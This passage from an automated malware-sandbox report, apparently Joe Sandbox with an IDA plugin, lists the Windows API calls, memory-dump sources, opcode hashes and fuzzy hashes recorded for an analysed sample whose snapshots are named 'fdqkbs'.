                                                                                  • Opcode Fuzzy Hash: becd376db111e51dd28bc4e702ae0aa9e7a99d884ca47acee649dad781d235b4
                                                                                  • Instruction Fuzzy Hash: B7218C718043998FDB11CFA9D4443DABFF8EB05314F54846AD494B7682C7789645CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022C96A9,00000800,00000000,00000000), ref: 022C98BA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 1029625771-443218294
                                                                                  • Opcode ID: 376b0b46101a4cefc28d9ab6c26a3527046b44b9ac16bf57541fbcd51cbfbfbb
                                                                                  • Instruction ID: 760efb53303669edea4ca533c063497534770e630d1c0c57430d30d658b271c7
                                                                                  • Opcode Fuzzy Hash: 376b0b46101a4cefc28d9ab6c26a3527046b44b9ac16bf57541fbcd51cbfbfbb
                                                                                  • Instruction Fuzzy Hash: C511F4B69042098FDB10CF9AC444AEEBBF5AB48314F50856EE919B7700C379A945CFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022C96A9,00000800,00000000,00000000), ref: 022C98BA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 1029625771-443218294
                                                                                  • Opcode ID: 66bcd7cca648663c14a630ea02f6907c2cdd2f3a37f8952cd298f3b42133f5e8
                                                                                  • Instruction ID: 37580d182743b4df8519c474d48aba95ee44fd0032fb305719db79787615b674
                                                                                  • Opcode Fuzzy Hash: 66bcd7cca648663c14a630ea02f6907c2cdd2f3a37f8952cd298f3b42133f5e8
                                                                                  • Instruction Fuzzy Hash: F21103B6D042098FDB10CF9AC884AEEBBF5AB88314F24856ED419B7710C378A545CFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0507B957
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFromIconResource
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 3668623891-443218294
                                                                                  • Opcode ID: 113e57f1b73b77763d7ac321973c869820ed799f16e6f414f505bfa10b5a68eb
                                                                                  • Instruction ID: a764d684232138ae436987f51ccdab690201002374b8f08f91b39d1263bb009e
                                                                                  • Opcode Fuzzy Hash: 113e57f1b73b77763d7ac321973c869820ed799f16e6f414f505bfa10b5a68eb
                                                                                  • Instruction Fuzzy Hash: B51126B18002499FDB10CFAAD844BDEBFF8EF48320F14841AE964B7210C379A954DFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,021953E8,00000000,?), ref: 0507E73D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 410705778-443218294
                                                                                  • Opcode ID: 1508b912a2a6b9a54acf17c2c58068504b8f3a06549e48908aa71b32b409e4c2
                                                                                  • Instruction ID: bcb888c8e3a4313dda3769605f49dba20ffd796ddc916de935a921e1ced603c8
                                                                                  • Opcode Fuzzy Hash: 1508b912a2a6b9a54acf17c2c58068504b8f3a06549e48908aa71b32b409e4c2
                                                                                  • Instruction Fuzzy Hash: BE1116B5800249DFDB10CF9AD845BEEBBF8EB48324F20846AE554A3341D378A944CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,021953E8,00000000,?), ref: 0507E73D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 410705778-443218294
                                                                                  • Opcode ID: d541503d777ea5e5d866db7819a1486daf99bd13047eb637ce5b56027f6ee3ae
                                                                                  • Instruction ID: ae044317824e0924d67a640e10805de4c84d4872819b86389c374c2632de70f1
                                                                                  • Opcode Fuzzy Hash: d541503d777ea5e5d866db7819a1486daf99bd13047eb637ce5b56027f6ee3ae
                                                                                  • Instruction Fuzzy Hash: E81149718002499FDB10CF9AD844BDEBFF8EB48310F20845AE454A3201D378A954CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0507226A,?,00000000,?), ref: 0507C435
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 3850602802-443218294
                                                                                  • Opcode ID: 4ae06ee0d7d80b98c800ab358b0e16fc3eeb35c53d80cf29215b0f34bc462661
                                                                                  • Instruction ID: db99c25037b26dd072350fc564f75669c52bd3edae77a06f0e66d939885ffe93
                                                                                  • Opcode Fuzzy Hash: 4ae06ee0d7d80b98c800ab358b0e16fc3eeb35c53d80cf29215b0f34bc462661
                                                                                  • Instruction Fuzzy Hash: 3F11E3B58002489FDB10CF9AD844BEEBBF8FB48314F20841AE959B7700C374A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 0507BCBD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 3850602802-443218294
                                                                                  • Opcode ID: 89fc7aae42d4256126bf1b601a9f3451df245325df85e9b6be198a9795d68f73
                                                                                  • Instruction ID: 84c7de714e14b8f6396cb47db4973091cb91ce27109949b3789f30f30ef8c4cf
                                                                                  • Opcode Fuzzy Hash: 89fc7aae42d4256126bf1b601a9f3451df245325df85e9b6be198a9795d68f73
                                                                                  • Instruction Fuzzy Hash: F611E3B5900248DFDB10CF9AD484BDEBBF8EB48314F10841AE559B7700D375A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000018,00000001,?), ref: 0507D29D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 410705778-443218294
                                                                                  • Opcode ID: 6255049e5784b5037d08922a4b32ac4258e927d1a8029b72b1ab7a0773aad8c1
                                                                                  • Instruction ID: b5d126d700ea33fc16d5215b517f250f947ff00af25786f224630eef1601c257
                                                                                  • Opcode Fuzzy Hash: 6255049e5784b5037d08922a4b32ac4258e927d1a8029b72b1ab7a0773aad8c1
                                                                                  • Instruction Fuzzy Hash: 6911F5B58042489FDB10DF9AD444BDEBBF8EB58310F10841AE919B7700D375A945CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 022C962E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 4139908857-443218294
                                                                                  • Opcode ID: d4f68db9cf6c8ae4e85a98bc96bba56fe798039d66daaf250c8f87913c73b49b
                                                                                  • Instruction ID: cc35f36ae11a54feb0eb1eb7a148bd46996255fe97f4b1768f33a383bae27ca8
                                                                                  • Opcode Fuzzy Hash: d4f68db9cf6c8ae4e85a98bc96bba56fe798039d66daaf250c8f87913c73b49b
                                                                                  • Instruction Fuzzy Hash: 8B110FB5C002498FCB10CF9AC844ADEFBF4AB88324F20851AD869B7744C378A545CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,?,?), ref: 022CFE9D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 1378638983-443218294
                                                                                  • Opcode ID: 32ed5755ceafefe5e8fde8b30d0ef42fdf97d3527168558db582663c37515952
                                                                                  • Instruction ID: ad3792f9e065ae55c03a456279c7cb1166d1eb08401acefffa96ef7f0d2615a4
                                                                                  • Opcode Fuzzy Hash: 32ed5755ceafefe5e8fde8b30d0ef42fdf97d3527168558db582663c37515952
                                                                                  • Instruction Fuzzy Hash: 8D1133B5800209CFDB10DF9AC684BDEBBF4EB48324F20851AD859B7741C378AA45CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,?,?), ref: 022CFE9D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 1378638983-443218294
                                                                                  • Opcode ID: 56807ba060ef35ad32f19c5d50d494e2c5eb335abc48fbfb1f87dca21f1aca49
                                                                                  • Instruction ID: 5fc9ae145cc7f159cbe3fb2a657924860bf70dc42202a32183674b323b999007
                                                                                  • Opcode Fuzzy Hash: 56807ba060ef35ad32f19c5d50d494e2c5eb335abc48fbfb1f87dca21f1aca49
                                                                                  • Instruction Fuzzy Hash: 741103B58002098FDB10CF9AD584BDEBBF8EB48324F20855AD818B7701C378A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00404A94), ref: 0040750A
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00404A94), ref: 00407549
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$Free
                                                                                  • String ID:
                                                                                  • API String ID: 3328510275-0
                                                                                  • Opcode ID: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                                                                                  • Instruction ID: b1f7f09f612f60460f80359e47cfd29f29434f3d7477643bc4f3bdfe63dfc6bb
                                                                                  • Opcode Fuzzy Hash: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                                                                                  • Instruction Fuzzy Hash: 44E09B3754D63136D112323A7C4999F1A0DCFC6679715023BF4147A2C5EE789D0200EE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,?), ref: 004064EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
                                                                                  • Instruction ID: 3efc618f0b7f40eca7bec11a0985368c4a4d2247eacbb5d5b70fa3bd5a8b9347
                                                                                  • Opcode Fuzzy Hash: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
                                                                                  • Instruction Fuzzy Hash: F6F0B43160852466DB219F22DD05B5B3758DB81770B17853BAC5ABA2C0CA78E82196AC
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00406E77,?), ref: 00407D7A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                                                                                  • Instruction ID: 65cd16bcdc1b8bd721fcda30d9bca64849d6530a3f0c9080c4415b1d98ca3938
                                                                                  • Opcode Fuzzy Hash: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                                                                                  • Instruction Fuzzy Hash: 9FE0A931A0862456EA202B269C00F6B3A498F823B0B154233EC05B62D2DA7DE80182AF
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 91bf27941265bdad5d9d7bda7ef7875a5acd4e4256704c2bab282f4423983198
                                                                                  • Instruction ID: 57735c2be2c00fc7476b254abe96ffc6dc27baa9bd32b08c287f9e08f9e84d15
                                                                                  • Opcode Fuzzy Hash: 91bf27941265bdad5d9d7bda7ef7875a5acd4e4256704c2bab282f4423983198
                                                                                  • Instruction Fuzzy Hash: 1321D3B1504348DFDB15DF24D8C0B36BF66FB98318F24C569EA058B246C33AD856DBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 287707365fb8d38a9a6aa0169cfab5c0af3793bcfd087d01d24ad0af87eb374f
                                                                                  • Instruction ID: dca2cefe43a6639fd33c52e2a13664e41b7e5efd2cd1a7fc8737f8ad5be58c13
                                                                                  • Opcode Fuzzy Hash: 287707365fb8d38a9a6aa0169cfab5c0af3793bcfd087d01d24ad0af87eb374f
                                                                                  • Instruction Fuzzy Hash: 9F21C1B1504348DFDB15DF24D8C0B26BF66FBA8314F348569EA098B246C33AD856DBE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.280359183.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_90d000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 45193c3fb9dc748cf1cc5b26fd849c1f94ebd90fdea9413cbd4a93bc83d827b6
                                                                                  • Instruction ID: 04543e14bf0766eec147c4aaa5bb059dc8d63dc0e815fa216b22e0dc1dd38597
                                                                                  • Opcode Fuzzy Hash: 45193c3fb9dc748cf1cc5b26fd849c1f94ebd90fdea9413cbd4a93bc83d827b6
                                                                                  • Instruction Fuzzy Hash: 5B21D471905240EFDB05DF98D9C0B26BBA5FB88314F24CA6DE8494B286C33AD846CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.280359183.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_90d000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0773906eb5eaf21f061a1307f0e64be6735b1971017d1ff0df49e8e4c2cd3097
                                                                                  • Instruction ID: 1cfd3293b52ad95a4a11793d3ed770b84ffa687f0a67906e0ec6a4cf08373ea9
                                                                                  • Opcode Fuzzy Hash: 0773906eb5eaf21f061a1307f0e64be6735b1971017d1ff0df49e8e4c2cd3097
                                                                                  • Instruction Fuzzy Hash: 7421C275604240DFDB15DF64D8C4B26BBB9FB88314F24C969E84E4B286C33AD846CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a30ec54f9a54b6d7c9e3aee45e7f4ac53dfe1a9eddc68f9a16636451495a4f50
                                                                                  • Instruction ID: 678f39ca813edf403f19b87e36fe53b8d9ab254fb70b58d4f4db5766fe34a9a8
                                                                                  • Opcode Fuzzy Hash: a30ec54f9a54b6d7c9e3aee45e7f4ac53dfe1a9eddc68f9a16636451495a4f50
                                                                                  • Instruction Fuzzy Hash: 2511B176904284CFDB12CF10D5C4B26BF72FB94324F24C6A9DA098B216C33AD856CBE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a30ec54f9a54b6d7c9e3aee45e7f4ac53dfe1a9eddc68f9a16636451495a4f50
                                                                                  • Instruction ID: c826abebffee5effa13a7bc9fb6a05fd5e9636731d644dadfc7b76cf2ba168c0
                                                                                  • Opcode Fuzzy Hash: a30ec54f9a54b6d7c9e3aee45e7f4ac53dfe1a9eddc68f9a16636451495a4f50
                                                                                  • Instruction Fuzzy Hash: 0711D676904384CFDB11CF14D5C4B16BF72FB88314F24C6A9D9454B656C336D456CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.280359183.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_90d000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c3364e02cfa8d68cc02e7d961ad0f09aaf9bdd96dc08ed4b3430cf65677459e1
                                                                                  • Instruction ID: eb2821a3bd9950fde9409bb31e63ef2b84fd56d11f4b42f083e80be9a3760c42
                                                                                  • Opcode Fuzzy Hash: c3364e02cfa8d68cc02e7d961ad0f09aaf9bdd96dc08ed4b3430cf65677459e1
                                                                                  • Instruction Fuzzy Hash: 99118B75904280DFDB11CF54D5D4B15BBB2FB84324F24C6AAD8494B696C33AD84ACBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.280359183.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_90d000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c3364e02cfa8d68cc02e7d961ad0f09aaf9bdd96dc08ed4b3430cf65677459e1
                                                                                  • Instruction ID: b7b689c876e92e597b0fbebe93d8e2c81a52fc6318727b9735f9180e3345c20d
                                                                                  • Opcode Fuzzy Hash: c3364e02cfa8d68cc02e7d961ad0f09aaf9bdd96dc08ed4b3430cf65677459e1
                                                                                  • Instruction Fuzzy Hash: 9B11DD76904280DFDB12CF58D5C0B15FBB2FB84314F24C6AED8494B696C33AD84ACB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 58125daf11916169e28de9ed2d5df4e436f9375eebc7b8c7bf15c48a9f121cfd
                                                                                  • Instruction ID: c144ad2ebb2f6a27ee0d62a909211b6aa1c5f80a12fd541b41904f8c1caf1680
                                                                                  • Opcode Fuzzy Hash: 58125daf11916169e28de9ed2d5df4e436f9375eebc7b8c7bf15c48a9f121cfd
                                                                                  • Instruction Fuzzy Hash: 3801FC314087489AE7104A35DC80776BFD8FFC1364F18C11AEF489F242D7789805C6B1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c2d783e5f0d30612a75f5e20b903187aa0d0343a7aa9bb1495544d5231cb5e55
                                                                                  • Instruction ID: d5a9393e3a2607a40380549383c1842db519cec576b23acc15fbcc46351bf9d0
                                                                                  • Opcode Fuzzy Hash: c2d783e5f0d30612a75f5e20b903187aa0d0343a7aa9bb1495544d5231cb5e55
                                                                                  • Instruction Fuzzy Hash: D5F06271404784AEE7108E2ADC84B62FFD8EB91734F28C55AEE485F286C7799C44CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401C8F
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00401D5B
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401D7B
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00401D85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 254469556-0
                                                                                  • Opcode ID: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                                                                                  • Instruction ID: 03da4fdce737ae66b50b035683398d13283d912606226935be00c523356d6f7c
                                                                                  • Opcode Fuzzy Hash: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                                                                                  • Instruction Fuzzy Hash: F4314C75D0131C9BDB10DF61D949BCDBBB8BF08304F1041AAE44CAB290EB745A848F48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00402091
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 2325560087-0
                                                                                  • Opcode ID: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
                                                                                  • Instruction ID: f4e6d6712146c31b67f0ac610b88ab6e8419e367a2555085ce8b4d0adaa77c0e
                                                                                  • Opcode Fuzzy Hash: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
                                                                                  • Instruction Fuzzy Hash: F6515AB1911A15CBDB14CF94DAD97EABBF1FB88314F14857AC445EB3A0D3B89900CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00403A0A
                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 00403B18
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00403C6A
                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00403C85
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 2751267872-393685449
